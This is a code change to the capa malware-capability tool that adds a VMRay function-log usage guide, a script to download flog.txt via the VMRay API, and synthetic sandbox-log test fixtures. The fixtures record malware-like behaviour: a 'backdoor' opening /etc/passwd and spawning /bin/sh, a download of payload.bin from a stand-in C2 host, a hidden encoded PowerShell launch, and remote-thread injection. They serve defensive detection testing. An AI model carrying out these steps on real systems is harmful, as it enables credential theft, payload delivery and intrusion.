vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt

Addresses reviewer feedback on #2878:

1. Document flog.txt vs full archive trade-offs in doc/usage.md with a
   comparison table (available features, how to obtain, file size).

2. Add scripts/fetch-vmray-flog.py — given a VMRay instance URL, API key,
   and sample SHA-256, downloads flog.txt via the REST API and optionally
   runs capa against it.

3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with
   three representative flog.txt files:
   - windows_apis.flog.txt: Win32 APIs, string args with backslash paths,
     numeric args, multi-process
   - linux_syscalls.flog.txt: Linux sys_-prefixed calls (all stripped)
   - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty

   tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering
   API, String, and Number extraction at the call scope, plus negative checks
   (double-backslash must not appear; sys_ prefix must not appear).

Fixes #2878

Author: devs6186

CHANGELOG.md

@@ -6,6 +6,7 @@
 
 - ghidra: support PyGhidra @mike-hunhoff #2788
 - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452
+- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878
 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835
 
 ### Breaking Changes

doc/usage.md

@@ -16,6 +16,36 @@ See `capa -h` for all supported arguments and usage examples.
 
 By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched.
 
+## VMRay: flog.txt vs full analysis archive
+
+When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file.
+Choose based on what you have access to and what features you need.
+
+| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** |
+|-|-|-|
+| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* |
+| **File size** | Small text file | Large encrypted ZIP |
+| **Dynamic API calls** | ✓ | ✓ |
+| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Static imports / exports** | ✗ | ✓ |
+| **PE/ELF section names** | ✗ | ✓ |
+| **Embedded file strings** | ✗ | ✓ |
+| **Base address** | ✗ | ✓ |
+| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) |
+
+**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log.
+
+**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data.
+
+```
+# flog.txt — free, limited to dynamic API calls
+capa path/to/flog.txt
+
+# Full VMRay archive — requires subscription, richer features
+capa path/to/analysis_archive.zip
+```
+
 ## tips and tricks
 
 ### only run selected rules

scripts/fetch-vmray-flog.py

@@ -0,0 +1,270 @@
+#!/usr/bin/env python3
+# Copyright 2025 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+"""
+Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it.
+
+Given a sample SHA-256 hash and VMRay credentials, this script:
+  1. Looks up the sample on the VMRay instance.
+  2. Finds the most-recent analysis for that sample.
+  3. Downloads the flog.txt (Download Function Log) from the analysis archive.
+  4. Optionally runs capa against the downloaded file.
+
+Requirements:
+  pip install requests
+
+Usage::
+
+    python scripts/fetch-vmray-flog.py \\
+        --url  https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --output /tmp/sample_flog.txt
+
+    # Fetch and immediately run capa:
+    python scripts/fetch-vmray-flog.py \\
+        --url  https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --run-capa
+
+VMRay API reference:
+  https://docs.vmray.com/documents/api-reference/
+
+Note: this script requires a VMRay account.  The flog.txt itself is freely available
+("Download Function Log") in the VMRay Threat Feed web UI, but downloading it
+programmatically via the REST API requires valid API credentials.
+"""
+
+import argparse
+import logging
+import subprocess
+import sys
+from pathlib import Path
+
+import requests
+
+logger = logging.getLogger(__name__)
+
+# ---------------------------------------------------------------------------
+# VMRay REST API helpers
+# ---------------------------------------------------------------------------
+
+_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt"
+
+
+def _session(url: str, apikey: str) -> requests.Session:
+    """Return an authenticated requests.Session for the given VMRay instance."""
+    s = requests.Session()
+    s.headers.update(
+        {
+            "Authorization": f"api_key {apikey}",
+            "Accept": "application/json",
+        }
+    )
+    s.verify = True  # set to False only when using self-signed certificates
+    s.base_url = url.rstrip("/")  # type: ignore[attr-defined]
+    return s
+
+
+def _get(session: requests.Session, path: str, **kwargs) -> dict:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.json()
+
+
+def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.content
+
+
+def lookup_sample(session: requests.Session, sha256: str) -> dict:
+    """
+    Return the VMRay sample record for the given SHA-256.
+    Raises ValueError if the sample is not found.
+    """
+    data = _get(session, f"/rest/sample/sha256/{sha256}")
+    if data.get("result") != "ok" or not data.get("data"):
+        raise ValueError(f"sample not found on VMRay instance: {sha256}")
+    # data["data"] is a list; take the first entry
+    return data["data"][0]
+
+
+def get_latest_analysis(session: requests.Session, sample_id: int) -> dict:
+    """
+    Return the most-recent finished analysis for the given VMRay sample ID.
+    Raises ValueError if no analysis is found.
+    """
+    data = _get(session, "/rest/analysis", params={"sample_id": sample_id})
+    analyses = data.get("data", [])
+    if not analyses:
+        raise ValueError(f"no analyses found for sample_id={sample_id}")
+    # Sort by analysis_id descending (newest first)
+    analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True)
+    return analyses[0]
+
+
+def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes:
+    """
+    Download the flog.txt content for the given VMRay analysis ID.
+
+    VMRay exposes the function log via the analysis archive endpoint.
+    We request only the flog_txt entry from the archive using the
+    ``file_filter`` query parameter.
+    """
+    # Try the dedicated log endpoint first (VMRay >= 2024.x)
+    try:
+        content = _get_bytes(
+            session,
+            f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary",
+        )
+        if content:
+            return content
+    except requests.HTTPError:
+        pass
+
+    # Fallback: download via the analysis archive with a file filter
+    content = _get_bytes(
+        session,
+        f"/rest/analysis/{analysis_id}/archive",
+        params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH},
+    )
+    return content
+
+
+# ---------------------------------------------------------------------------
+# main
+# ---------------------------------------------------------------------------
+
+
+def main(argv=None):
+    if argv is None:
+        argv = sys.argv[1:]
+
+    parser = argparse.ArgumentParser(
+        description="Download VMRay flog.txt for a sample hash and (optionally) run capa."
+    )
+    parser.add_argument(
+        "--url",
+        required=True,
+        metavar="URL",
+        help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com",
+    )
+    parser.add_argument(
+        "--apikey",
+        required=True,
+        metavar="KEY",
+        help="VMRay REST API key (Settings → API Keys).",
+    )
+    parser.add_argument(
+        "--sha256",
+        required=True,
+        metavar="SHA256",
+        help="SHA-256 hash of the sample to analyse.",
+    )
+    parser.add_argument(
+        "--output",
+        metavar="PATH",
+        help="Where to save the downloaded flog.txt.  Defaults to <sha256>_flog.txt in the current directory.",
+    )
+    parser.add_argument(
+        "--run-capa",
+        action="store_true",
+        dest="run_capa",
+        help="After downloading, run 'capa <output>' and print the results.",
+    )
+    parser.add_argument(
+        "--capa-args",
+        metavar="ARGS",
+        default="",
+        help="Extra arguments forwarded to capa (only used with --run-capa).",
+    )
+    parser.add_argument(
+        "--no-verify-ssl",
+        action="store_false",
+        dest="verify_ssl",
+        help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).",
+    )
+    parser.add_argument(
+        "-d", "--debug", action="store_true", help="Enable debug logging."
+    )
+    args = parser.parse_args(argv)
+
+    logging.basicConfig(
+        level=logging.DEBUG if args.debug else logging.INFO,
+        format="%(levelname)s: %(message)s",
+    )
+
+    output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt")
+
+    session = _session(args.url, args.apikey)
+    session.verify = args.verify_ssl  # type: ignore[assignment]
+
+    # Step 1 — look up sample
+    logger.info("looking up sample %s …", args.sha256)
+    try:
+        sample = lookup_sample(session, args.sha256)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find sample: %s", exc)
+        return 1
+
+    sample_id: int = sample["sample_id"]
+    logger.debug("found sample_id=%d", sample_id)
+
+    # Step 2 — find the latest analysis
+    logger.info("fetching analysis list for sample_id=%d …", sample_id)
+    try:
+        analysis = get_latest_analysis(session, sample_id)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find analysis: %s", exc)
+        return 1
+
+    analysis_id: int = analysis["analysis_id"]
+    logger.debug("using analysis_id=%d", analysis_id)
+
+    # Step 3 — download flog.txt
+    logger.info("downloading flog.txt for analysis_id=%d …", analysis_id)
+    try:
+        flog_bytes = download_flog_txt(session, analysis_id)
+    except requests.HTTPError as exc:
+        logger.error("failed to download flog.txt: %s", exc)
+        return 1
+
+    if not flog_bytes:
+        logger.error(
+            "received empty response — flog.txt may not be available for this analysis"
+        )
+        return 1
+
+    output_path.write_bytes(flog_bytes)
+    logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes))
+
+    # Step 4 (optional) — run capa
+    if args.run_capa:
+        capa_cmd = ["capa", str(output_path)] + (
+            args.capa_args.split() if args.capa_args else []
+        )
+        logger.info("running: %s", " ".join(capa_cmd))
+        result = subprocess.run(capa_cmd)
+        return result.returncode
+
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt

@@ -0,0 +1,43 @@
+# Log Creation Date: 02.01.2025 12:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x1234"
+os_parent_pid = "0x1"
+parent_id = "0"
+image_name = "backdoor"
+filename = "/tmp/backdoor"
+cmd_line = "/tmp/backdoor"
+monitor_reason = "analysis_target"
+
+Region:
+id = "1"
+name = "stack"
+
+Thread:
+id = "1"
+os_tid = "0x1234"
+ [0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100
+ [0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6
+ [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
+ [0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+ [0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4
+ [0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0
+ [0001.006] sys_fork () returned 0x2345
+ [0001.007] sys_getuid () returned 0x0
+ [0001.008] sys_setuid (uid=0x0) returned 0x0
+ [0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0
+ [0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0
+ [0001.011] sys_time (tloc=0x0) returned 0x677f2000
+ [0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0
+ [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0
+ [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000
+ [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0
+ [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0
+ [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+ [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0
+ [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5
+ [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20
+ [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40

tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt

@@ -0,0 +1,37 @@
+# Log Creation Date: 03.01.2025 08:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x2000"
+os_parent_pid = "0x4"
+parent_id = "0"
+image_name = "edgecase.exe"
+filename = "c:\\users\\test\\edgecase.exe"
+cmd_line = "edgecase.exe"
+monitor_reason = "analysis_target"
+
+Region:
+id = "5"
+name = "private_0x0000000000010000"
+
+Thread:
+id = "1"
+os_tid = "0x2100"
+ [0001.000] GetCurrentProcess () returned 0xffffffffffffffff
+ [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8
+ [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0
+ [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9
+ [0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff
+ [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0
+ [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1
+ [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1
+ [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0
+ [0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1
+ [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0
+ [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256
+ [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128
+ [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1
+ [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1
+ [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200